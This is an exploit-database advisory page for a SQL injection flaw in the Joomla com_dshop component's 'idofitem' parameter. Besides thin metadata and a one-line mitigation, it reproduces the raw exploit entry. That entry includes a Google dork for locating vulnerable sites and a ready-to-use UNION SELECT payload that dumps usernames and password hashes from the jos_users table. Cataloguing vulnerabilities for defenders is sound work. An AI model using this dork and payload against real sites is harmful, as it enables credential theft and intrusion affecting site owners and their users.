Joomla Component (com_dshop) SQL Injection Vulnerability

vendor:

Joomla Component (com_dshop)

by:

CoBRa_21

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Joomla Component (com_dshop)

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

N/A

Joomla Component (com_dshop) SQL Injection Vulnerability

A SQL injection vulnerability exists in Joomla Component (com_dshop) which allows an attacker to execute arbitrary SQL commands via the 'idofitem' parameter in a 'flypage' action to the 'fpage' controller.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

################################################################################################
#  Exploit Title: Joomla Component (com_dshop) SQL Injection Vulnerability
#
#  Author : CoBRa_21 
#
#  E-Mail : uyku_cu [at] windowslive.com
#
#  Google Dork : inurl:com_dshop
#
#  Status : High-Risk
#
#  Script Page : null
#
#  Reference : https://www.securityfocus.com/bid/47971/info
################################################################################################
#
#  SQL Vulnerability
#
#  http://127.0.0.1/[PATH]/index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12 (SQL)
#
#  SQL Exploit
#
#  +union+select+0,1,2,group_concat(username,0x3a,password),4,5,6,7+from+jos_users
#
################################################################################################
#                                                                                                   ( Vulnerability Researcher ) 
################################################################################################